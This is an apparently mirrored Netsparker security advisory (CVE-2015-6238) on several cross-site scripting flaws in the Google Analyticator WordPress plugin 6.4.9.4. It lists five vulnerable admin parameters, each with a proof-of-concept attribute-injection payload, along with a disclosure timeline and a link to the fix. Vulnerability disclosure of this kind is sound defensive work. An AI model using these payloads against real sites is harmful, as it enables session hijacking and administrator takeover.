Google Analyticator 6.4.9.4 Cross Site Scripting

2015-08-25T00:00:00
ID PACKETSTORM:133301
Type packetstorm
Reporter Omar Kurt
Modified 2015-08-25T00:00:00

Description

                                        
                                            `Information  
--------------------  
Advisory by Netsparker.  
Name: Multiple XSS Vulnerabilities in Google Analyticator  
Affected Software : Google Analyticator (WordPress Plugin)  
Affected Versions: 6.4.9.4 and possibly below  
Vendor Homepage : https://wordpress.org/plugins/google-analyticator/  
Vulnerability Type : Cross-site Scripting  
Severity : Important  
Status : Fixed  
CVE-ID : CVE-2015-6238  
Netsparker Advisory Reference : NS-15-013  
  
Description  
--------------------  
By exploiting a Cross-site scripting vulnerability the attacker can hijack  
a logged in user’s session. This means that the malicious hacker can change  
the logged in user’s password and invalidate the session of the victim  
while the hacker maintains access. As seen from the XSS example in this  
article, if a web application is vulnerable to cross-site scripting and the  
administrator’s session is hijacked, the malicious hacker exploiting the  
vulnerability will have full admin privileges on that web application.  
  
Technical Details  
--------------------  
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:  
  
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator  
Parameter Name ga_adsense  
Parameter Type POST  
Attack Pattern x'" onmouseover=alert(9)  
  
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator  
Parameter Name ga_admin_disable_DimentionIndex  
Parameter Type POST  
Attack Pattern x'" onmouseover=alert(9)  
  
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator  
Parameter Name ga_downloads_prefix  
Parameter Type POST  
Attack Pattern x'" onmouseover=alert(9)  
  
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator  
Parameter Name ga_downloads  
Parameter Type POST  
Attack Pattern x'" onmouseover=alert(9)  
  
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator  
Parameter Name ga_outbound_prefix  
Parameter Type POST  
Attack Pattern x'" onmouseover=alert(9)  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/  
  
Advisory Timeline  
--------------------  
14/08/2015 - First Contact  
24/08/2015 - Vendor Fixed  
24/08/2015 - Advisory Released  
  
Solution  
--------------------  
https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip  
  
Credits & Authors  
--------------------  
These issues have been discovered by Omar Kurt while testing Netsparker Web  
Application Security Scanner.  
  
About Netsparker  
--------------------  
Netsparker finds and reports security issues and vulnerabilities such as  
SQL Injection and Cross-site Scripting (XSS) in all websites and web  
applications regardless of the platform and the technology they are built  
on. Netsparker's unique detection and exploitation techniques allows it to  
be dead accurate in reporting hence it's the first and the only False  
Positive Free web application security scanner. For more information visit  
our website on https://www.netsparker.com  
  
--   
Onur Yılmaz - National General Manager  
  
Netsparker Web Application Security Scanner <https://www.netsparker.com>  
T: +90 (0)554 873 0482  
`